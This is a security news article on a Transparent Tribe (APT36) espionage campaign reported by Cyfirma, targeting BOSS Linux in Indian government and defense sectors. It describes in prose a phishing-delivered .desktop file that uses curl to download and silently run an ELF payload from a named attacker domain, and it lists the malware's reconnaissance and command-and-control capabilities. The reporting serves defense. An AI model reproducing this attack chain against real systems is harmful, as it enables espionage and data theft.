Transparent Tribe Targets Indian Sectors with New BOSS Linux Espionage Campaign

An ongoing cyber-espionage operation by Transparent Tribe (aka. APT36, COPPER FIELDSTONE, Mythic Leopard, and ProjectM) was discovered and reported by Cyfirma. The group, attributed to state-sponsored operations, has expanded its focus to target Linux environments, specifically systems running BOSS Linux, a distribution commonly deployed across Indian government agencies. Cyfirma raised concerns about the threat this poses to organizations in critical infrastructure, defense, and government sectors in India. The motive behind these campaigns remains consistent with previous activity: espionage, maintaining persistent access, and exfiltrating sensitive data.

The observed attack chain begins with phishing emails delivering a ZIP archive labeled “Cyber-Security-Advisory.zip,” which contains a ".desktop" file crafted to appear as a legitimate security advisory. Once executed, the file initiates a sequence of commands that change the working directory to "/tmp," download a PowerPoint decoy and a malicious ELF binary using "curl" from attacker-controlled infrastructure, and execute the payload silently in the background using “chmod +x” and “nohup.” The domain “sorlastore[.]com” used for hosting the payloads has historical ties to prior malware distribution campaigns. As Cyfirma reports, "This domain, along with several associated subdomains, has been leveraged in a range of targeted attacks, particularly against personnel and systems within the Indian defense sector." The staged execution, which uses a PowerPoint document as a decoy, allows the malware to install and run with minimal user awareness, achieving initial compromise while evading detection.

Technical analysis of the malware, identified as “client.elf,” revealed multiple capabilities aimed at reconnaissance, persistence, and data theft. The malware collects system information such as CPU and RAM specifications and inspects running services, including CUPS, to identify opportunities for lateral movement or persistence. Command-and-control communication is established over TCP port 12520, utilizing "setKeepAlive" and "setKeepAlivePeriod" functions to maintain uninterrupted connectivity. Reconnaissance functions include listing drives, searching files, and capturing screenshots via a Go-based library. These capabilities enable attackers to gather intelligence and exfiltrate valuable data while maintaining a low operational profile on the compromised systems. Cyfirma observed that while the command-and-control server was inactive at the time of analysis, the infrastructure remains a viable threat for reactivation.

Cyfirma warns that Transparent Tribe’s latest campaign demonstrates an advancement in targeting Linux-based environments. Their warning: "Government, defense, and critical infrastructure organizations using BOSS Linux or other Linux-based platforms should treat this threat as a high-priority concern." The malware’s stealth, use of legitimate-looking decoy files, and technical capabilities for persistence and data exfiltration emphasize the need for hardened detection mechanisms, continuous monitoring, and comprehensive user awareness programs to mitigate the risks posed by advanced and persistent threat actors.